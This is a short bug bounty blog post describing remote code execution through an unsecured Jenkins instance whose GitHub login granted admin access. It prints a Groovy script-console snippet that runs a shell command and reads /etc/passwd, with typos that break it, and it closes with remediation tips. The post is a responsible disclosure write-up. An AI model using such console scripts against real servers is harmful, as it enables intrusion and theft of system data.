September 7, 2018

RCE Unsecure Jenkins Instance | Bug Bounty POC

Hi Guys,

Honestly i was just getting bored and the blog wasn’t updated ina while so i decided to write this  (Will share some more recent issues in a few days 🙂 )


So i want this Write Up to be concise.. to Let’s Just say I was checking subdomains of a site and  found a subdomain

so By Name i got that it Must be a Jenkins Instance so i opened that subdomain and got redirected to Github Login Page


But the jenkins instant lac any kind of security for user as i visited it i simply Asks me to login to jenkins Instant using my Github account, As soon as loged inn to your jenkins instant i had complete admin access to your jenkins instant, and i was on the Users Page Like



Now As Many of you guys already know that Jenkins Instance have a Script page where a user can go and Execute Groovy Script and You can also install a Plugin called Terminal for it


So running a simple script as


def command = “uname -a”
def proc = commadn.execute()

println “Process exit code: ${proc.exitValue()}”
prinln “Std Err: ${proc.err.text}”
println “std Out: ${}”


String fileContents = new File(‘/etc/passwd’).getText(‘UTF-8’)


So this Groovy Script will execute the command



So At this point you can be sure that you have an RCE in the service and you can execute any script command you want So i did that just to be sure





So I wrote a Report related to it and Send it to the CTO of the website 🙂 and the issue was migrated Urgently


  1. Make Your You set the permissions for your Jenkins Instance Properly
  2. Make sure only allow Trusted users to install plugins or using Groovy Script

Do read the Detailed Post by nahamsec

Note: The Issue was Reported and is been Migrated the Blog was written after getting Permission from the CTO Matt ( ) 🙂 and also the site DoSomething Don;t have a Bug Bounty Program Anymore so Kindly avoid any kind of testing. 


Thanks for Reading ^_^

Discover more from Security Breached Blog

Subscribe to get the latest posts sent to your email.

You may also like